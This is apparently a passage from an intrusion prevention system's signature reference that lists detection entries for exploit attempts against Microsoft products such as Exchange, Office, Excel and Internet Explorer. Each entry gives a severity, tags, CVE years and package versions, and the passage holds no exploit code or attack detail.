First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
Description:
Back to top

File-TextId_Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: Microsoft-.NET-Framework-XPS-File-Parsing-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Microsoft-Adobe-Font-Manager-Library-Type-1-Vtohorigin-Handling-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Azure Open Management Infrastructure detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Azure Open Management Infrastructure, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass
Description:
Back to top

File-TextId_Microsoft-Direct2d-SVG-Path-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Any Hardware, MS2014-03, CVE2014, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Microsoft-Direct2d-SVG-Path-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-DirectX-Sami-File-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows 2000, Any Hardware, DirectX, MS2007-12, CVE2007, Windows 2000 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-DirectX-Sami-File-Parsing-Code-Execution
Description:
Back to top

File-TextId_Microsoft-DirectX-Sami-Format-Parsing-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft DirectX detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2008-06, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Excel-2002-XML-Document

About this situation: Microsoft Excel 2002 XML download detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel 2002, Microsoft Excel 2003, Microsoft Excel 2004 for Mac, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Microsoft-Excel-2013-Workbook

About this situation: Microsoft Excel 2013 workbook download detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Excel 2013, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
Description:
Back to top

File-TextId_Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2016-12, CVE2016, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-835-5242
Vulnerability: Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass
Description:
Back to top

File-TextId_Microsoft-Excel-File-Importing-Code-Execution

About this situation: Malicious Microsoft Excel SYLK document download detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Excel-File-Importing-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Excel-Rept-Function-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office SharePoint Server, Microsoft Office, Microsoft Open XML File Format Converter, Microsoft Office Compatibility Pack, Microsoft Office System, MS2008-10, CVE2008, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office SharePoint Server not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Excel-Rept-Function-Integer-Overflow
Description:
Back to top

File-TextId_Microsoft-Excel-Security-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, CVE2021, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Microsoft-Excel-Security-Feature-Bypass
Description:
Back to top

File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2023-09, CVE2023, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: Microsoft-Exchange-Approvedapplication-Insecure-Deserialization
Microsoft-Exchange-Sharedtyperesolver-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-36777
Description:
Back to top

File-TextId_Microsoft-Exchange-Calendar-Code-Execution

About this situation: Detects Microsoft Exchange Server 2000 and 2003 Calendar exploit
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2006-05, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Exchange-Calendar-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Exchange-Deserialization-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Microsoft-Exchange-Deserialization-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2023-11, CVE2023, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2023-08, MS2023-09, CVE2023, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization
Microsoft-Exchange-PowerShell-Remoting-Gsmwriter-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2023-11, CVE2023, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Vulnerability: Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Exchange Server, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-RCE-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2020-09, CVE2020, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1314-5242
Vulnerability: Microsoft-Exchange-CVE-2020-16875-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2022-03, CVE2022, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2022-03, CVE2022, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Vulnerability: Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection
Description:
Back to top

File-TextId_Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2020-12, CVE2020, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1309-5242
Last changed: sgpkg-ips-1309-5242
Vulnerability: Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2020-11, CVE2020, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1310-5242
Vulnerability: Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write
Description:
Back to top

File-TextId_Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2020-11, CVE2020, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write
Description:
Back to top

File-TextId_Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2023-11, CVE2023, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-Exchange-Unsafe-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2023-02, CVE2022, CVE2023, Windows not specific, Exchange Server not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1530-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: Microsoft-Exchange-Unsafe-Deserialization-CVE-2022-41082
Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21529
Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21706
Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-21707
Microsoft-Exchange-PowerShell-Remoting-Command-Insecure-Deserialization
Description:
Back to top

File-TextId_Microsoft-FrontPage-Information-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft FrontPage detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft FrontPage, MS2013-09, CVE2013, Windows not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-542-5211
Vulnerability: Microsoft-FrontPage-Information-Disclosure-Vulnerability
Description:
Back to top

File-TextId_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft Help Workshop detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, x86, Microsoft Help Workshop, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Help Workshop detected.
Context: Identified Text File Stream
Severity: 7
Tags: Windows, x86, Microsoft Help Workshop, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2005-02, CVE2005, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption

About this situation: Detects crafted rat files with an excessively long name attribute value
Context: Identified Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2005-04, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-02, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-565-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free

About this situation: Traffic that resembles an attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2015-04, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Vulnerability: Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-Propertydesc-Double-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Microsoft-Internet-Explorer-Propertydesc-Double-Free
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-04, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-649-5211
Vulnerability: Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free
Description:
Back to top

File-TextId_Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134
Description:
Back to top

File-TextId_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Office-ASLR-Bypass-CVE-2015-2375

About this situation: A vulnerability in Microsoft Office
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Microsoft-Office-ASLR-Bypass-CVE-2015-2375
Description:
Back to top

File-TextId_Microsoft-Office-Ctasksymbol-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2015-09, CVE2015, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Microsoft-Office-Ctasksymbol-Use-After-Free
Description:
Back to top

File-TextId_Microsoft-Office-CVE-2015-1649

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2011, Microsoft Office Web Apps 2010, Microsoft Office 2013, Microsoft Office 2013 RT, Microsoft Office Web Apps 2013, Microsoft Sharepoint Server 2010, Microsoft Sharepoint Server 2013, MS2015-04, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-638-5211
Vulnerability: Microsoft-Office-CVE-2015-1649
Description:
Back to top

File-TextId_Microsoft-Office-CVE-2015-1650

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-04, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-638-5211
Vulnerability: Microsoft-Office-CVE-2015-1650
Description:
Back to top

File-TextId_Microsoft-Office-CVE-2015-1682-Remote-Code-Execution

About this situation: A document that triggers a Microsoft Office vulnerability detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office 2010, Microsoft Excel 2010, Microsoft Excel 2013, Microsoft Office 2013, Microsoft PowerPoint 2010, Microsoft PowerPoint 2013, MS2015-05, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-646-5211
Last changed: sgpkg-ips-646-5211
Vulnerability: Microsoft-Office-CVE-2015-1682-Remote-Code-Execution
Description:
Back to top

File-TextId_Microsoft-Office-CVE-2016-3284-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2016-07, CVE2016, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-780-5211
Vulnerability: Microsoft-Office-CVE-2016-3284-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-Office-CVE-2019-0560-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2019, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Microsoft-Office-CVE-2019-0560-Information-Disclosure
Description:
Back to top

File-TextId_Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2017, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion
Description:
Back to top

File-TextId_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2023-06, CVE2023, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Vulnerability: Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
Description:
Back to top

File-TextId_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2023-06, CVE2023, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Vulnerability: Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
Description:
Back to top

File-TextId_Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, Microsoft Office 2016, MS2015-10, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1341-5242
Vulnerability: Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558
Description:
Back to top

File-TextId_Microsoft-Office-Oleobject-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Office, CVE2017, Windows not specific, Microsoft Word not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1011-5242
Last changed: sgpkg-ips-1011-5242
Vulnerability: Microsoft-Office-Oleobject-Type-Confusion
Description:
Back to top

File-TextId_Microsoft-Office-RCE-CVE-2017-0199

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2017-04, CVE2017, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Miscrosoft-Office-RCE-CVE-2017-0199
Description:
Back to top

File-TextId_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2015-06, CVE2015, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-652-5211
Last changed: sgpkg-ips-652-5211
Vulnerability: Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
Description:
Back to top

File-TextId_Microsoft-Office-Word-And-Web-Apps-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Microsoft Office Web Apps Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2014-10, CVE2014, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Microsoft-Office-Word-And-Web-Apps-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-Outlook-iCal-Meeting-Request-Vevent-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, x86, Microsoft Outlook, MS2007-01, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-Outlook-iCal-Meeting-Request-Vevent-Record-Memory-Corruption
Description:
Back to top

File-TextId_Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass

